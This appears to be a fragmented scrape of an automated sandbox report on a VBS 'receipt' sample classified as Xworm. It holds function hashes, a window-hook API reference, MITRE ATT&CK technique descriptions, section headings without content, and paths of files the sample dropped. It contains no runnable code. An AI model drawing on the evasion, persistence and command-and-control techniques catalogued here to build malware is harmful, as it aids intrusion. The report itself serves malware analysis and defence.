Snapshot File: hcaresult_16_2_1630000_RegSvcs.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c8f7074cb3281956d2b3ed04e1812aff479e37ea0f35c4d50d3edd022b8b36c0
Instruction ID: fa5e2f84b35403cc7fd7c58ced704eed09e7538519b48da4f851cbc7f309438a
Opcode Fuzzy Hash: c8f7074cb3281956d2b3ed04e1812aff479e37ea0f35c4d50d3edd022b8b36c0
Instruction Fuzzy Hash: F72137B5D00209DFDB14CFAAD844BEEBBF4EF88310F14842AD416A7290CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01635AC8 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01635B43

Memory Dump Source

Source File: 00000010.00000002.2607816931.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1630000_RegSvcs.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 733b69110a7e6ec15de1b981e48a381d8a58154c0625f1a9300c08bfeab98059
Instruction ID: 51d59c3282242d8c1a5e334100501b7925432efe801bfb2e38fe58b99c00e725
Opcode Fuzzy Hash: 733b69110a7e6ec15de1b981e48a381d8a58154c0625f1a9300c08bfeab98059
Instruction Fuzzy Hash: 922118759002098FDB14DF9AD844BDEBBF4EB88310F14842AD415A7250CB74A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012CD428 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602499771.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc794c2f2e6bc5484027adbf5366821c2f542b7e892c457764e087066d00b3f3
Instruction ID: b3b45bcd31c4aebab5ad4055ac4f621ea008620e318892b0511b58d94586d141
Opcode Fuzzy Hash: fc794c2f2e6bc5484027adbf5366821c2f542b7e892c457764e087066d00b3f3
Instruction Fuzzy Hash: A12133B1510248EFDB21CF54D9C0B66FB65FB88714F20C67DEB090A246C336E856CAE2

Uniqueness

Uniqueness Score: -1.00%

Function 012DD0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602852939.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12dd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58e46ca56ad785363bee2a00f8480f2836c79d3d1eb263da02961982bb1d1d4f
Instruction ID: 6a609492ef559237d8f817eb3edd97b6620fccfe66713c2a21e6dd4058ed46c0
Opcode Fuzzy Hash: 58e46ca56ad785363bee2a00f8480f2836c79d3d1eb263da02961982bb1d1d4f
Instruction Fuzzy Hash: 262146B1514708EFDB05DF64C9C0B26BBA5FB88314F20C56DD9094B2C2C376D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012DD01C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602852939.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12dd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e6ca070ad2306d81c3a147984c80b91c6bf8380ed8d599dc8ee6924c009ca3
Instruction ID: 5f8fcebc1707ed41e7f85f16d793db439acb8c070bb04f48e86ce1e4eab6cebd
Opcode Fuzzy Hash: 84e6ca070ad2306d81c3a147984c80b91c6bf8380ed8d599dc8ee6924c009ca3
Instruction Fuzzy Hash: 42213471614748DFDB10DF64C9C0F26BBA5EBC4355F20C56DDA094B282C376D847C662

Uniqueness

Uniqueness Score: -1.00%

Function 012DD006 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602852939.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12dd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551f311d04763e17cad9a962d0992fdf7dc367a218eede00db9377b03553f049
Instruction ID: f9cbae96c7a72d527919e35ce1f648bc7503d97010fe28077b9718d3e114f99c
Opcode Fuzzy Hash: 551f311d04763e17cad9a962d0992fdf7dc367a218eede00db9377b03553f049
Instruction Fuzzy Hash: DE21AE755097848FCB13CF24C9D0B15BF71EB85314F28C5EAC9488B6A3C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012CD423 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602499771.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12cd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction ID: 8194acb2fb4ea8201d3b8661440beed0662a32073dd1e1d791b5182d857e7f4f
Opcode Fuzzy Hash: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction Fuzzy Hash: 5411DF72404284CFCB12CF14D5C0B56FF61FB84714F24C6ADDA090B656C336E456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012DD0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2602852939.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_12dd000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction ID: 7b2968010fd6a92665084010b0c5bd95fbfc8a2eaf28b87d5180a518ce1c5cb7
Opcode Fuzzy Hash: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction Fuzzy Hash: FB11DD75504684CFDB06CF68D9C4B15FFB1FB84314F24C6AAD9094B696C33AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
Tactics:	Persistence
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report E7236252-receipt.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

Spreading

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\moquenqueiro.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2FMK3KK3\eCmZ7z04[1].txt

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

Windows Analysis Report
E7236252-receipt.vbs

**\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON**

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre